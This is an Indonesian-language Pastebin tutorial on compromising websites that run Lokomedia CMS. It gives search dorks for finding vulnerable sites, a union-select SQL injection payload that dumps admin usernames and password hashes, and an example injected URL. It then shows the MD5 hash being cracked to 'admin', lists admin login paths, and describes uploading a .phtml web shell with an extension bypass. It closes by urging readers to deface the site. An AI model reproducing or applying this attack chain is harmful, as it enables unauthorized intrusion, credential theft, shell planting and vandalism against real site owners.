Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Hello World ; Siang Fans, Please Say Hello Haters :*
- xixixhi, maap yo baru update artikel, Lanjut Walking Blog geenggs,
- pade masihh kuat kan puasanyee ampe bedug maghrib akwkwak :D
- yoks, kali ini Gue akan ngebahas salah Satu Bug/Celah
- yg ada pada CMS Lokomedia nih, kite suntik2an dlu,
- *jekinjectbumi akwkwak :p *ini tutor lama sih >.< *share aja,
- kali aja masih crotz
- Langsung aje Tutorial SQL Injection on Lokomedia CMS
- Dork : - inurl:kategori-23-hiburan.html
- - inurl:hal-tentang-kami.html
- - inurl:statis-1-pengantar.html
- - inurl:statis-19-beasiswa.html
- - inurl:statis-22-kerjasama.html
- (kembangin lagi gunakan otak bokepers Lu,
- biar dpt yg Vuln and Verawan gengs ;*)
- eXploit : 'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+
- 1. Dorking menggunakan Search Engine
- 2. Pilih web target, Lalu masukan eXploitnya.
- di target saya menjadi seperti ini: target.c0li/statis--7'union%20select%20/*!50000Concat*/(username,0x20,password)+from+users--+--+kantordesa.html
- Sekarang sudah kelihatan user sama passwordnya di bagian title.
- kemudian ctrl+u untuk melihatnya lebih jelas.
- Terlihat User : joko dan Pasword : 21232f297a57a5a743894a0e4a801fc3 ,
- karena password masih dalam bentuk MD5 maka harus di decrypt,
- saya menggunakan HashKiller, dan setelah didecrypt hasilnya adalah password: admin.
- Kalian bisa gunakan web atau aplikasi laen utk ngeDecrypt MD5 ini.
- Untuk login biasanya di :
- - www.target.c0li/admin
- - www.target.c0li/adminweb
- - www.target.c0li/administrator
- - www.target.c0li/redaktur
- Kali ini loginnya berada di target.c0li/adminweb/
- , Kemudian masukan user dan pass di form.
- Untuk mengupload shell bisa dibagian Download
- Untuk mengakses shell biasanya di target.c0li/files/namashellLu
- *Shell harus berekstensi .phtml *atao coba bypass ekstensi ke yg laen :3
- Done, silahkan masuk ke shell lu:D
- Silahkan Acak" Webnya:v
- Terimakasih.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement